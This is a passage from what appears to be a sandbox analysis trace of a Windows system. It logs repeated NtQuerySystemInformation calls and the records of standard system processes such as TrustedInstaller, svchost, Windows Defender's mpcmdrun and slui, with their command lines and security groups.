[0303.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) Thread: id = 679 os_tid = 0x774 Thread: id = 698 os_tid = 0xd38 Process: id = "40" image_name = "trustedinstaller.exe" filename = "c:\\windows\\servicing\\trustedinstaller.exe" page_root = "0x1695d000" os_pid = "0xa50" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\servicing\\TrustedInstaller.exe" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\TrustedInstaller" [0xe], "NT AUTHORITY\\Logon Session 00000000:0007d697" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 638 os_tid = 0xbf8 Thread: id = 639 os_tid = 0x100c Thread: id = 640 os_tid = 0xf4c Thread: id = 641 os_tid = 0xf74 Thread: id = 642 os_tid = 0x1328 Thread: id = 643 os_tid = 0xac8 Thread: id = 644 os_tid = 0x900 Process: id = "41" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x25a01000" os_pid = "0xe98" os_integrity_level = "0x4000" os_privileges = "0x20900080" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\System32\\svchost.exe -k WerSvcGroup" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\WerSvc" [0xe], "NT AUTHORITY\\Logon Session 00000000:00087c0b" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 645 os_tid = 0x109c Thread: id = 646 os_tid = 0x12d0 Thread: id = 647 os_tid = 0x10dc Thread: id = 648 os_tid = 0x10d4 Thread: id = 649 os_tid = 0x1020 Thread: id = 650 os_tid = 0x1330 Process: id = "42" image_name = "taskhostw.exe" filename = "c:\\windows\\system32\\taskhostw.exe" page_root = "0x3423d000" os_pid = "0x1194" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x3ac" cmd_line = "taskhostw.exe -RegisterDevice -SettingChange -Full" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xe], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wisvc" [0xe], "NT SERVICE\\wlidsvc" [0xe], "NT SERVICE\\WpnService" [0xe], "NT SERVICE\\wuauserv" [0xe], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 674 os_tid = 0x13cc Thread: id = 677 os_tid = 0xbc8 Thread: id = 692 os_tid = 0x830 Thread: id = 693 os_tid = 0xcec Thread: id = 694 os_tid = 0x1238 Thread: id = 696 os_tid = 0x1370 Thread: id = 700 os_tid = 0x994 Process: id = "43" image_name = "mpcmdrun.exe" filename = "c:\\program files\\windows defender\\mpcmdrun.exe" page_root = "0x2141c000" os_pid = "0x380" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x3d8" cmd_line = "\"C:\\Program Files\\Windows Defender\\mpcmdrun.exe\" -wdenable" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AJRouter" [0xa], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Dhcp" [0xe], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\RmSvc" [0xa], "NT SERVICE\\TimeBrokerSvc" [0xe], "NT SERVICE\\TimeBroker" [0xe], "NT SERVICE\\vmictimesync" [0xa], "S-1-5-80-1495648203-2503502111-1597754693-3445174711-1316708627" [0xa], "NT SERVICE\\wscsvc" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000a38e" [0xc000000f], "LOCAL" [0x7] Thread: id = 680 os_tid = 0xdb4 Thread: id = 686 os_tid = 0x520 Thread: id = 687 os_tid = 0x115c Thread: id = 688 os_tid = 0x1150 Thread: id = 689 os_tid = 0x124c Thread: id = 690 os_tid = 0x1170 Thread: id = 691 os_tid = 0x1154 Process: id = "44" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1b0c1000" os_pid = "0xd40" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0x380" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AJRouter" [0xa], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Dhcp" [0xe], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\RmSvc" [0xa], "NT SERVICE\\TimeBrokerSvc" [0xe], "NT SERVICE\\TimeBroker" [0xe], "NT SERVICE\\vmictimesync" [0xa], "S-1-5-80-1495648203-2503502111-1597754693-3445174711-1316708627" [0xa], "NT SERVICE\\wscsvc" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000a38e" [0xc000000f], "LOCAL" [0x7] Thread: id = 681 os_tid = 0x980 Thread: id = 682 os_tid = 0x9d0 Thread: id = 683 os_tid = 0x129c Thread: id = 684 os_tid = 0x1220 Thread: id = 685 os_tid = 0x1180 Process: id = "45" image_name = "sppextcomobj.exe" filename = "c:\\windows\\system32\\sppextcomobj.exe" page_root = "0x1975e000" os_pid = "0x738" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "22" os_parent_pid = "0x2a4" cmd_line = "C:\\WINDOWS\\system32\\SppExtComObj.exe -Embedding" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\sppsvc" [0xe], "NT AUTHORITY\\Logon Session 00000000:000793bd" [0xc000000f], "LOCAL" [0x7] Thread: id = 702 os_tid = 0xcb8 [0300.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) Thread: id = 703 os_tid = 0x2bc Thread: id = 704 os_tid = 0x440 Thread: id = 705 os_tid = 0x11e0 Thread: id = 706 os_tid = 0xd0c Thread: id = 707 os_tid = 0x79c Process: id = "46" image_name = "slui.exe" filename = "c:\\windows\\system32\\slui.exe" page_root = "0x13dea000" os_pid = "0xd84" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "45" os_parent_pid = "0x738" cmd_line = "\"C:\\WINDOWS\\System32\\SLUI.exe\" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\sppsvc" [0xe], "NT AUTHORITY\\Logon Session 00000000:000793bd" [0xc000000f], "LOCAL" [0x7] Thread: id = 708 os_tid = 0x5b8 Thread: id = 709 os_tid = 0xa80 Thread: id = 710 os_tid = 0xf80 Thread: id = 711 os_tid = 0x12c8 Thread: id = 712 os_tid = 0x12d4 Thread: id = 713 os_tid = 0x1234 Thread: id = 714 os_tid = 0xf94